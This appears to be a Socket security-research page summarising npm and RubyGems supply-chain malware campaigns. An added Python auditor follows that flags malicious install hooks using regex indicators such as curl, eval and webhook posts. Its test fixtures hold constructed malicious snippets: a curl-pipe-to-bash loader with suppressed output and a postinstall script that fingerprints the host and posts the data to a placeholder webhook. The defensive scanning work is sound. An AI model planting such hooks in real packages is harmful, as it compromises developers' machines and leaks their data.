Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Nov 23, 2025

Shai Hulud v2

Shai Hulud v2 campaign: a preinstall script (setup_bun.js) and a loader (setup_bin.js) that install or locate Bun and then execute an obfuscated, bundled malicious script (bun_environment.js) with its output suppressed.

Nov 05, 2025

Elves on npm

A surge of auto-generated "elf-stats" npm packages is being published from new accounts, roughly one every two minutes. The packages contain simple malware variants and are being rapidly removed by npm. At least 420 unique packages have been identified; some mention a capture-the-flag challenge or a test.

Jul 04, 2025

RubyGems Automation-Tool Infostealer

Since at least March 2023, a threat actor using multiple aliases uploaded 60 malicious gems to RubyGems that masquerade as automation tools (Instagram, TikTok, Twitter, Telegram, WordPress, and Naver). The gems display a Korean Glimmer-DSL-LibUI login window, then exfiltrate the entered username/password and the host's MAC address via HTTP POST to threat actor-controlled infrastructure.

Mar 13, 2025

North Korea's Contagious Interview Campaign

Since late 2024, we have tracked hundreds of malicious npm packages and supporting infrastructure tied to North Korea's Contagious Interview operation, with tens of thousands of downloads targeting developers and tech job seekers. The threat actors run a factory-style playbook: recruiter lures and fake coding tests, polished GitHub templates, and typosquatted or deceptive dependencies that install or import into real projects.

Jul 23, 2024

Network Reconnaissance Campaign

A malicious npm supply chain attack that leveraged 60 packages across three disposable npm accounts to fingerprint developer workstations and CI/CD servers during installation. Each package embedded a compact postinstall script that collected hostnames, internal and external IP addresses, DNS resolvers, usernames, home and working directories, and package metadata, then exfiltrated this data as a JSON blob to a hardcoded Discord webhook.
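The Shai Hulud v2 entry and this reconnaissance entry share one mechanism: an npm lifecycle hook that runs automatically during install. The following added example (not Socket's detector and not the campaign code) audits a package before installation: it reads the install hooks from package.json, follows the script files those hooks reference (so a loader that hands off to a bundled file is still seen), and reports indicators matching the behaviour described above, such as host fingerprinting, a webhook POST, downloading a runtime, or suppressed output. The two sample packages, their file contents and their host names are constructed here.

```python
"""Audit npm install hooks before `npm install` gets to run them.

Added example, not Socket's scanner and not code from either campaign. The
manifests and script files below are constructed; the hosts are placeholders.
"""
import json
import re

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Each indicator is a regex over the hook command plus any script file it reaches.
INDICATORS = {
    "downloads": r"\bcurl\b|\bwget\b|https?://",
    "spawns_process": r"child_process|execSync|spawn\(|\bexec\(",
    "bootstraps_runtime": r"\bbun\b",
    "eval": r"\beval\(|new Function\(|node\s+-e\b",
    "fingerprints_host": r"os\.hostname|networkInterfaces|userInfo|getServers|process\.env",
    "exfiltrates": r"https?\.request|fetch\(|/api/webhooks",
    "suppresses_output": r'''stdio:\s*['"]ignore['"]|/dev/null|--silent''',
}
_BLOCKING = {"downloads", "eval", "exfiltrates", "bootstraps_runtime"}
_JS_FILE_RE = re.compile(r"[\w./-]+\.(?:m?js|cjs)\b")


def _referenced_files(text: str) -> list:
    return _JS_FILE_RE.findall(text)


def audit_package(manifest_json: str, files: dict) -> list:
    """One finding per install hook: the command, the script files reached
    from it (transitively), and the sorted indicator names that matched."""
    scripts = json.loads(manifest_json).get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        text, seen, queue = cmd, set(), _referenced_files(cmd)
        while queue:  # follow loader -> bundled script chains
            name = queue.pop()
            if name in seen or name not in files:
                continue
            seen.add(name)
            text += "\n" + files[name]
            queue.extend(_referenced_files(files[name]))
        hits = sorted(k for k, pat in INDICATORS.items() if re.search(pat, text))
        findings.append({"hook": hook, "command": cmd, "files": sorted(seen), "indicators": hits})
    return findings


def verdict(findings: list) -> str:
    """'block' on any download/eval/exfil/runtime indicator; 'review' when an
    install hook exists but matched nothing; 'ok' when there are no hooks."""
    if any(_BLOCKING & set(f["indicators"]) for f in findings):
        return "block"
    return "review" if findings else "ok"


# Constructed samples (not the real packages).
CLEAN_MANIFEST = json.dumps({"name": "example-clean", "version": "1.0.0",
                             "scripts": {"test": "node test.js"}})
LOADER_MANIFEST = json.dumps({"name": "example-loader", "version": "1.0.0",
                              "scripts": {"preinstall": "node setup_bun.js"}})
LOADER_FILES = {
    "setup_bun.js": (
        "const { execSync } = require('child_process');\n"
        "try { execSync('bun --version', { stdio: 'ignore' }); }\n"
        "catch { execSync('curl -fsSL https://bun.example.invalid/install | bash', { stdio: 'ignore' }); }\n"
        "execSync('bun bun_environment.js', { stdio: 'ignore' });\n"),
    "bun_environment.js": (
        "/* constructed stand-in for an obfuscated bundle */\n"
        "eval(Buffer.from('Y29uc29sZS5sb2coMSk=', 'base64').toString());\n"),
}
RECON_MANIFEST = json.dumps({"name": "example-recon", "version": "1.0.0",
                             "scripts": {"postinstall": "node postinstall.js"}})
RECON_FILES = {
    "postinstall.js": (
        "const os = require('os'), https = require('https');\n"
        "const info = { host: os.hostname(), user: os.userInfo().username,\n"
        "  nics: os.networkInterfaces(), dns: require('dns').getServers(), cwd: process.cwd() };\n"
        "https.request({ hostname: 'discord.example.invalid', path: '/api/webhooks/000/constructed',\n"
        "  method: 'POST' }).end(JSON.stringify(info));\n"),
}

if __name__ == "__main__":
    for label, manifest, files in (("clean", CLEAN_MANIFEST, {}),
                                   ("loader", LOADER_MANIFEST, LOADER_FILES),
                                   ("recon", RECON_MANIFEST, RECON_FILES)):
        found = audit_package(manifest, files)
        print(label, verdict(found), found)
```

Running `npm install --ignore-scripts` (or setting `ignore-scripts=true` in .npmrc) stops these hooks from running at all; the audit above is for deciding whether a package that needs its hooks should be allowed to keep them.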

Ready to dive in?

Get protected by Socket with just 2 clicks.

Install GitHub App
Book a Demo

The latest from the Socket team

Get our latest security research, open source insights, and product updates.
